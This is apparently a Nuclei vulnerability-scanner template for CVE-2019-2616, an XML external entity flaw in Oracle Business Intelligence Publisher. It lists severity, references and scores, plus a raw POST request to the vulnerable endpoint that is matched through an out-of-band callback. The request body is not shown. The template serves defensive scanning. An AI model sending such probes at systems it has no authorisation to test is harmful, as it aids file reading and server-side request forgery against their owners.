id: CVE-2019-2616 info: name: Oracle Business Intelligence/XML Publisher - XML External Entity Injection author: pdteam severity: high description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. impact: | Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/46729 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Ostorlab/KEV classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 epss-score: 0.94801 epss-percentile: 0.99268 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: business_intelligence_publisher tags: cve,cve2019,oracle,xxe,oast,kev,edb http: - raw: - | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # digest: 4a0a00473045022100f94a7523a6b2d3029683d487100c7471f31bc148f1a0279518a51a7c61df462902202538dac4a94f712e9756893e94183a58e214eea3ea8acb73ca67fcd85bb752b0:922c64590222798bb761d5b6d8e72950